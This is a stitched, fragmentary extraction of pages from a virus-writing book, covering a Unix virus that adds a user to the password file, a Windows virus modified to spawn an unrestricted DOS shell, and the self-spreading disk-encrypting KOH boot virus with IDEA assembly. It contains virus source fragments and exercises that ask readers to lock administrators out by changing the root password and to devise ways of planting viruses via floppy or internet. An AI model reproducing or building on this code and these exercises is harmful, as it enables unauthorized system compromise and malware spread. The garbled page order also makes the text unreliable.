using, for example, the usual password file editor, vipw. At that
point the database will be rebuilt and the changes effected by
Snoopy will be activated.
430 The Giant Black Book of Computer Viruses
Access Rights
To jump across accounts and directories on a Unix computer,
a virus must be careful about what access rights it gives to the
various files it infects. If not, it will cause obvious problems when
programs which used to be executable by a user cease to be without
apparent reason, etc.
In Unix, files can be marked with read, write and executable
attributes for the owner, for the group, and for other users, for a
total of nine attributes.
Snoopy takes the easy route in handling these permission bits
by making all the files it touches maximally available. All read,
write and execute bits are set for both the virus and the host. This
strategy also has the effect of opening the system up, so that files
with restricted access become less restricted when infected.
Exercises
1. Add the code to rebuild the password database automatically, either by
executing the pwd_mkdb program or by calling the database functions
directly.
2. Once Snoopy has done its job, it makes sense for it to go away. Add a
routine which will delete every copy of it out of the current directory if
the passwd file already contains the snoopy user.
3. Modify Snoopy to also change the password for root so that the system
administrator will no longer be able to log in once the password database
is rebuilt.
Chapter 35
Adding
Functionality to a
Windows Program
Source Code for this Chapter: \YELT-S\YELTSIN.ASM
what one would call a secure operating system. None the less, its
install base is so huge, you can find it in all kinds of places being
used as if it were secure. For example, many schools and libraries
have computers linked to the internet using Windows 95 and the
Internet Explorer. They might have babysitter programs installed
to make sure you don’t access any politically incorrect web sites,
etc., or to make sure you don’t run any programs you shouldn’t run.
If you can get to a DOS prompt, you can shut down any
software you don’t want running and gain free reign on that
computer mightily easily. To get a DOS prompt, you need a
program that acts as a shell without any restrictions. There was quite
a ruckus a year or two ago when hackers discovered that Internet
Explorer has shell functionality which can be used to get a DOS
prompt. But what if you don’t have access to a shell?
Wouldn’t it be nice to have a virus that gave shell capabilities
to any program it infected? That would certainly compromise
security in a big way! In fact, modifying one of our 32-bit Windows
viruses to do this is incredibly easy.
Let’s take Yeltsin, and turn it into Yeltsin-S. The main infection
routine ends simply enough like this:
EXIT: add esp,WORKSP
popad ;get rid of temporary data area
HADDR: jmp HOST ;@ dynamically modified by virus
COMCOM db ’C:\COMMAND.COM’,0
down. If not, the virus just exits in the usual way, jumping to
EXIT2, which is identical to the original EXIT.
If, however, the Shift key is down, the virus next makes a call
to WinExec, which executes the program named at the label COM-
COM. That program is the DOS COMMAND.COM command
processor. It could be anything else you l ike—for example PROG-
MAN.EXE, the Windows shell.
The only other thing needed to make this modification work is
to add the GetAsyncKeyState and WinExec function addresses to
the address tables in BASICS.INC so the virus knows where to call
these functions:
WIN_EXEC DD WINEXEC
GET_ASYNC_KEY_STATE DD GETASYNCKEYSTATE
and
WINEXEC EQU 0BFF9CFE8H ;@WinExec
GETASYNCKEYSTATE EQU 0BFF623B1H ;@GetAsyncKeyState
Exercises
1. Add a similar modification to Jadis. Be aware that WinExec is part of
KERNEL32, but GetAsyncKeyState is part of USER32.
3. Devise a way to insert a virus like this into a computer that has a floppy
disk drive.
4. Devise a way to insert a virus like this when you are a user accessing
the internet.
434 The Giant Black Book of Computer Viruses
Chapter 36
KOH: A Good Virus
Source for this chapter: \KOH\KOH.ASM
Why a Virus?
Encrypting disks is, of course, something useful that many
people would like to do. The obvious question is, why should a
1 See Fred Cohen’s books, A Short Course on Computer Viruses, and It’s Alive! for
further discussion of this subject.
436 The Giant Black Book of Computer Viruses
1. Virus Technology
If one wants to encrypt a whole disk, including the root direc-
tory, the FAT tables, and all the data, a boot sector virus would be
an ideal approach. It can load before even the operating system boot
sector (or master boot sector) gets a chance to load. No software
that works at the direction of the operating system can do that. In
order to load the operating system and, say, a device driver, at least
the root directory and the FAT must be left unencrypted, as well as
operating system files and the encrypting device driver itself.
Leaving these areas unencrypted is a potential security hole which
could be used to compromise data on the computer.
By using technology originally developed for boot sector vi-
ruses (e.g. the ability to go resident before DOS loads), the encryp-
tion mechanism lives beneath the operating system itself and is
completely transparent to this operating system. All of every sector
is encrypted without question in an efficient manner. If one’s
software doesn’t do that, it can be very hard to determine what the
security holes even are.
2. Self-Reproduction
The KOH program also acts like a virus in that—if you
choose—it will automatically encrypt and migrate to every floppy
disk you put in your computer to access. This feature provides an
important housekeeping function to keep your environment totally
secure. You never need to worry about whether or not a particular
disk is encrypted. If you’ve ever accessed it at all, it will be. Just
by normally using your computer, everything will be encrypted.
Furthermore, if you ever have to transport a floppy disk to
another computer, you don’t have to worry about taking the pro-
gram to decrypt with you. Since KOH is a virus, it puts itself on
KOH: A Good Virus 437
anything in the remaining 507 bytes that are written. They may
contain part of a directory or part of another file that was recently
in memory.
So suppose you want to write a “ safe” file to an unencrypted
floppy to share with someone. Just because that file doesn’t contain
anything you want to keep secret doesn’t mean that whatever was
in memory before it is similarly safe. And it could go right out to
disk with whatever you wanted to put there.
Though KOH doesn’t clean up these buffers, writing only
encrypted data to disk will at least keep the whole world from
looking at them. Only people with the floppy disk password could
snoop for this end-of-file-data. (To further reduce the probability
of someone looking at it, you should also clean up the file end with
something like CLEAN.ASM, listed in Figure 36.1).
The Physical Disk
If one views a diskette as an analog device, it is possible to
retrieve data from it that has been erased. For this reason even a
so-called secure erase program which goes out and overwrites
clusters where data was stored is not secure. (And let’s not even
mention the DOS delete command, which only changes the first
letter of the file name to 0E5H and cleans up the FAT. All of the
data is still sitting right there on disk!)
There are two phenomena that come into play which prevent
secure erasure. One is simply the fact that in the end a floppy disk
is analog media. It has magnetic particles on it which are statisti-
cally aligned in one direction or the other when the drive head writes
to disk. The key word here is statistically. A write does not simply
align all particles in one direction or the other. It just aligns enough
that the state can be unambiguously interpreted by the analog-to-
digital circuitry in the disk drive.
For example, consider Figure 36.2. It depicts three different
“ ones” read from a disk. Suppose A is a virgin 1, written to a disk
that never had anything written to it before. Then a one written over
a zero would give a signal more like B, and a one written over
another one might have signal C. All are interpreted as digital ones,
but they’re not all the same. With the proper analog equipment you
can see these differences (which are typically 40 dB weaker than
the existing signal) and read an already-erased disk. The same can
KOH: A Good Virus 439
;CLEAN will clean up the “unused” data at the end of any file simply by
;calling it with “CLEAN FILENAME”.
.model tiny
.code
ORG 100H
CLEAN:
mov ah,9 ;welcome message
mov dx,OFFSET HIMSG
int 21H
xor al,al ;zero file buffer
mov di,OFFSET FBUF
mov cx,32768
rep stosb
mov bx,5CH
mov dl,[bx] ;drive # in dl, get FAT info
mov ah,1CH
push ds ;save ds as this call messes it up
int 21H
pop ds ;now al = sectors/cluster for this drive
cmp al,40H ;make sure cluster isn’t too large
jnc EX ;for this program to handle it (<32K)
xor ah,ah
mov cl,9
shl ax,cl ;ax = bytes/cluster now, up to 64K
mov [CSIZE],ax
mov ah,0FH ;open the file in read/write mode
mov dx,5CH
int 21H
mov bx,5CH
mov WORD PTR [bx+14],1 ;set record size
mov dx,[bx+18] ;get current file size
mov ax,[bx+16]
mov [bx+35],dx ;use it for random record number
mov [bx+33],ax
push dx ;save it for later
push ax
mov cx,[CSIZE] ;and divide it by cluster size
div cx ;cluster count in ax, remainder in dx
or dx,dx
jz C3
sub cx,dx ;bytes to write in cx
mov ah,1AH ;set DTA
mov dx,OFFSET FBUF
int 21H
mov dx,bx ;write to the file
mov ah,28H
mov cx,[CSIZE]
int 21H
C3: pop ax ;get original file size in dx:ax
pop dx
mov [bx+18],dx ;manually set file size to original value
mov [bx+16],ax
mov dx,bx
mov ah,10H ;now close file
int 21H
EX: mov ax,4C00H ;then exit to DOS
int 21H
HIMSG DB ’File End CLEANer, Version 2.0 (C) 1995 American Eagle Publica’
DB ’tions’,0DH,0AH,’$’
CSIZE DW ? ;cluster size, in bytes
FBUF DB 32768 dup (?) ;zero buffer written to end of file
END CLEAN
C
A
B
be said of a twice-erased disk, etc. The signals just get a little weaker
each time.
The second phenomenon that comes into play is wobble. Not
every bit of data is written to disk in the same place, especially if
two different drives are used, or a disk is written over a long period
of time during which wear and tear on a drive changes its charac-
teristics. (See Figure 36.3) This phenomenon can make it possible
to read a disk even if it’s been overwritten a hundred times.
The best defense against this kind of attack is to see to it that
one never writes an unencrypted disk. If all the spy can pick up off
the disk using such techniques is encrypted data, it will do him little
good. The auto-encryption feature of KOH can help make this never
a reality.
Infecting Disks
KOH infects diskettes just like BBS. It replaces the boot sector
with its own, and hides the original boot sector with the rest of its
code in an unoccupied area on the disk. This area is protected by
marking the clusters it occupies as bad in the FAT. The one
difference is that KOH only infects floppies if the condition flag
FD_INFECT is set equal to 1 (true). If this byte is zero, KOH is
essentially dormant and does not infect disks. We’ll discuss this
more in a bit. For now, suffice it to say that FD_INFECT is
user-definable.
When KOH infects a floppy disk, it automatically encrypts it
using the current floppy disk pass phrase. Encryption always pre-
ceds infection so that if the infection process fails (e.g. if the disk
too full to put the virus code on it) it will still be encrypted and work
properly. Note that the virus is polite. It will not in any instance
destroy data.
Like BBS, KOH infects hard disks only at boot time. Unlike
BBS, when migrating to a hard disk, KOH is very polite and always
asks the user if he wants it to migrate to the hard disk. This is easily
accomplished in code by changing a simple call,
call INFECT_HARD
Previous writes
Last write
to something like
mov si,OFFSET HARD_ASK
call ASK
jnz SKIP_INF
call INFECT_HARD
SKIP_INF:
Encryption
KOH uses the International Data Encryption Algorithm
(IDEA) to encrypt and decrypt data.2 IDEA uses a 16-byte key to
encrypt and decrypt data 16 bytes at a time. KOH maintains three
separate 16-byte keys, HD_KEY, HD_HPP and FD_HPP.3
In addition to the 16-byte keys, IDEA accepts an 8-byte vector
called IW as input. Whenever this vector is changed, the output of
the algorithm changes. KOH uses this vector to change the encryp-
2 This is the same algorithm that PGP uses internally to speed the RSA up.
3 "HPP" stands for “ Hashed Pass Phrase” .
KOH: A Good Virus 443
tion from sector to sector. The first two words of IW are set to the
values of cx and dx needed to read the desired sector with INT 13H.
The last two words are not used.
Since KOH is highly optimized to save space, the implemen-
tation of IDEA which it uses is rather convoluted and hard to follow.
Don’t be surprised if it doesn’t make sense, but you can test it
against a more standard version written in C to see that it does
indeed work.
Since a sector is 512 bytes long, one must apply IDEA 32 times,
once to each 16-byte block in the sector, to encrypt a whole sector.
When doing this, IDEA is used in what is called “ cipher block
chaining” mode. This is the most secure mode to use, since it uses
the data encrytped to feed back into IW. This way, even if the sector
is filled with a constant value, the second 16-byte block of en-
crypted data will look different from the first, etc., etc.
crypt a floppy when the pass phrase is changed. A new disk must
be put in the drive when the pass phrase is changed, because old
disks won’t be readable then. (Of course, it’s easy to change back
any time and you can start up with any pass phrases you like, as
well.)
Hard disks are a little more complex. Since they’re fixed,
changing the pass phrase would mean the disk would have to be
totally decrypted with the old pass phrase and then re-encrypted
with the new one. Such a process could take several hours. That
could be a problem if someone looked over your shoulder and
compromised your pass phrase. You may want to—and need
to—change it instantly to maintain the security of your computer,
not next Saturday when it’ll be free for six hours. Using a double
key HD_KEY and HD_HPP makes it possible to change pass phrases
very quickly. HD_HPP is a fixed key that never gets changed. That’s
what is built by pressing keys to generate a random number when
KOH is installed. This key is then stored along with FD_HPP in
one special sector. That special sector is kept secure by encrypting
it with HD_KEY. When one changes the hard disk pass phrase, only
HD_KEY is changed. Then KOH can just decrypt this one special
sector with the old HD_KEY, re-encrypt with the new HD_KEY, and
the pass phrase change is complete! Encrypting and decrypting one
sector is very fast—much faster than doing 10,000 or 50,000 sectors
Ctrl-Alt-H: Uninstall
The KOH virus is so polite, it even cleans itself off your disk
if you want it to. It will first make sure you really want to uninstall.
446 The Giant Black Book of Computer Viruses
Y
Read? Change to local stack
N N Y
Write? Format? Is it hard disk read?
N
Is encrypted? Turn FD infect Infect floppy disk
off temporarily
Y
Is it attempt to Error on infect?
overwrite virus? Jump to old
INT 13H
Do old INT 13
Encrypt data
@ es:bx N
Is encrypted?
Do old INT 13
Decrypt data @ es:bx
N
Is encrypted?
Restore stack
Decrypt data
Return to caller
Return to caller
If one agrees, KOH proceeds to decrypt the hard disk and remove
itself, restoring the original master boot sector.
Compatibility Questions
Because KOH has been available as freeware for some time,
users have provided lots of feedback regarding its compatibility
with various systems and software. That’s a big deal with systems
level software. As a result, KOH is probably one of the most
compatible viruses ever developed. Most just don’t get that kind of
critical testing from users.
KOH has been made available as freeware for nearly two years,
and it’s very compatible with a wide variety of computers. It works
well with all existing versions of DOS, Windows 3.X and Windows
KOH: A Good Virus 447
Legal Warning
As of the date of this writing, the KOH virus with strong
cryptography (the IDEA module) is illegal to export in executable
or compilable form from the US. If you create an executable of it
from the code in this book, and export it, you could be subject to
immediate confiscation of all your property without recourse, and
possibly also to jail after a trial. There is, however, no restriction
(at present) against exporting this code in printed form.
Because of this, the KOH virus included on the Companion
Disk with this book uses a simple XOR-based encryption routine
that is trivial to crack. If you want the strong cryptography, you’ll
have to type in the KOHIDEA.ASM module listed in this chapter
and replace the KOHIDEA.ASM file on the disk (which is really
XOR encryption) with what you typed in, and then assemble
KOH.ASM.
There. That doesn’t break the law. Doesn’t it make you happy
to know that the US government is so sensible?
448 The Giant Black Book of Computer Viruses
ROUNDS EQU 8
KEYLEN EQU 6*ROUNDS+4
IDEABLOCKSIZE EQU 8
_MUL ENDP
;PUBLIC PROCEDURE
;COMPUTE IDEA ENCRYPTION SUBKEYS Z
INITKEY_IDEA PROC NEAR
PUSH ES
PUSH DS
POP ES
MOV SI,[HPP]
MOV DI,OFFSET _USERKEY
PUSH DI
MOV CX,8
IILP: LODSW
XCHG AL,AH
STOSW
LOOP IILP
POP SI
MOV DI,OFFSET _Z
PUSH DI
MOV CL,8 ;CH=0 ON ENTRY ASSUMED
REP MOVSW
POP SI
XOR DI,DI ;I
MOV CH,8 ;J
SHLOOP:
INC DI ;I++
MOV BX,DI
SHL BX,1
PUSH BX
AND BX,14
ADD BX,SI
MOV AX,[BX] ;AX=Z[I & 7]
MOV BX,DI
INC BX
SHL BX,1
AND BX,14
ADD BX,SI
MOV DX,[BX] ;DX=Z[(I+1) & 7]
450 The Giant Black Book of Computer Viruses
MOV CL,7
SHR DX,CL
MOV CL,9
SHL AX,CL
OR AX,DX
POP BX
ADD BX,SI
MOV [BX+14],AX ;Z[I+7] = Z[I & 7]<<9 | Z[(I+1) & 7]>>7
MOV AX,DI
SHL AX,1
AND AX,16
ADD SI,AX ;Z += I & 8;
AND DI,7
INC CH ;LOOP UNTIL COUNT = KEYLEN
CMP CH,KEYLEN
JC SHLOOP
POP ES
RETN
INITKEY_IDEA ENDP
MOV SI,OFFSET _Z
MOV DI,ROUNDS ;DI USED AS A COUNTER FOR DO LOOP
PUSH BX
PUSH CX
PUSH DX
PUSH AX
XOR BX,CX ;T2=X1^X3 (T2 IN BX)
LODSW
CALL _MUL ;T2=MUL(T2,*Z++) (T2 IN AX)
POP CX ;CX=X1
POP DX ;DX=X2
PUSH DX
PUSH CX
XOR DX,CX ;T1=X2^X4 (T1 IN DX)
ADD DX,AX ;T1+=T2
MOV BX,DX ;T1 IN BX
PUSH AX
LODSW
KOH: A Good Virus 451
CALL _MUL ;T1=MUL(T1,*Z++)
POP BX ;T1 IN AX, T2 IN BX
ADD BX,AX ;T2+=T1
MOV BP,AX
POP AX
XOR AX,BX
POP DX
XOR BX,DX
POP CX
XOR CX,BP
POP DX
XOR DX,BP
PUSH AX
PUSH DX
PUSH BX
MOV BX,CX
LODSW
CALL _MUL
MOV CX,AX
POP BX
LODSW
ADD BX,AX
POP DX
LODSW
ADD DX,AX
POP AX
PUSH BX
MOV BX,AX
LODSW
PUSH CX
PUSH DX
CALL _MUL
MOV CX,AX
POP DX
POP AX
POP BX
POP BP
RETN
CIPHER_IDEA ENDP
;PUBLIC PROCEDURE
;VOID IDEASEC(BYTEPTR BUF); ENCRYPTS/DECRYPTS A 512 BYTE BUFFER
IDEASEC PROC NEAR
PUSH BP
MOV BP,SP
CMP BYTE PTR CS:[CFB_DC_IDEA],0
JNE IDEADECRYPT
JMP IDEACRYPT
IDEADECRYPT:
MOV BX,65 ;BX=COUNT
IS0: MOV AX,IDEABLOCKSIZE
POP ES
PUSH DS ;SWITCH DS AND ES
PUSH ES
POP DS
POP ES
MOV SI,[BP+4]
MOV DI,OFFSET IV ;DI=IV
MOV CX,IDEABLOCKSIZE / 2 ;CX=COUNT
REP MOVSW ;DO *IV++=*BUF++ WHILE (—COUNT);
PUSH DS ;SWITCH DS AND ES
PUSH ES
POP DS
POP ES
ISEX: POP BP
RETN 2
IDEACRYPT:
MOV SI,65 ;BX=COUNT
IS3: DEC SI ;CHUNKSIZE>0?
JZ ISEX ;NOPE, DONE
PUSH SI
PUSH ES
PUSH DS
POP ES ;DS=ES
MOV SI,OFFSET IV
LODSW
MOV CX,AX ;X1=*IN++
LODSW
MOV DX,AX ;X2=*IN++
LODSW
MOV BX,AX ;X3=*IN++
LODSW ;X4=*IN
CALL CIPHER_IDEA ;CIPHER_IDEA(IV_IDEA,TEMP,Z)
MOV DI,OFFSET _TEMP
STOSW
MOV AX,BX
STOSW
MOV AX,DX
STOSW
KOH: A Good Virus 453
MOV AX,CX
STOSW
POP ES
MOV DI,[BP+4]
MOV CX,IDEABLOCKSIZE / 2
MOV SI,OFFSET _TEMP
XLOOP_: LODSW
XOR ES:[DI],AX
INC DI
INC DI
LOOP XLOOP_
PUSH DS ;SWITCH DS AND ES
PUSH ES
POP DS
POP ES
MOV SI,[BP+4]
MOV DI,OFFSET IV ;DI=IV
MOV CX,IDEABLOCKSIZE / 2 ;CX=COUNT
REP MOVSW ;DO *IV++=*BUF++ WHILE (—COUNT);
PUSH DS ;SWITCH DS AND ES
PUSH ES
POP DS
POP ES
POP SI
ADD WORD PTR [BP+4],IDEABLOCKSIZE ;BUF+=CHUNKSIZE
JMP IS3
IDEASEC ENDP
Exercises
1. We’ve discussed using KOH to prevent sensitive data from leaving the
workplace. If an employee knows the hot keys, though, he could still
get data out. Modify KOH to remove the interrupt 9 handler so this
cannot be done. You might design a separate program to modify the
hard disk pass phrase. This can be kept by the boss so only he can change
the pass phrase on an employee’s hard disk.
IBM offers a Developer’s Connection for OS/2 for about $295 per year (again, 4
quarterly updates on CD). It includes software development kits for OS/2, and
extensive documentation. A device driver kit is available for an extra $100. It
can be obtained by calling (800)-633-8266, or writing The Developer Connec-
tion, PO Box 1328, Internal Zip 1599, Boca Raton, FL 33429-1328.
Annabooks offers a complete BIOS package for the PC, which includes full
source. It is available for $995 from Annabooks, 11838 Bernardo Plaza Court,
San Diego, CA 92128, (619)673-0870 or (800)673-1432. Not cheap, but loads
cheaper than developing your own from scratch.
458 The Giant Black Book of Computer Viruses
COM program file, definition 22
COM files, segment use 25
COM program with EXE header 56
companion virus, definition 39
computer virus, definition 15
computer virus, memory resident 63
computer virus, size 17
Computer Viruses, Artificial Life and
Evolution 366, 397
Concept virus 161
GIANT
This book contains complete source code for live computer viruses
which could be extremely dangerous in the hands of incompetent
persons. You can be held legally liable for the misuse of these
viruses. Do not attempt to execute any of the code in this book
unless you are well versed in systems programming for personal
computers, and you are working on a carefully controlled and
Computer Viruses
Black Book of
isolated computer system. Do not put these viruses on any
computer without the owner's consent.
LUDWIG
tools of choice for the information warriors of the 21st
century? Finally, you’ll learn about payloads for viruses,
not just destructive code, but also how to use a virus to
compromise the security of a computer, and the
possibility of beneficial viruses.
ISBN 0-929408-23-3 $39.95
5 3 9 9 5
Includes
Diskette!
9 780929 408231
M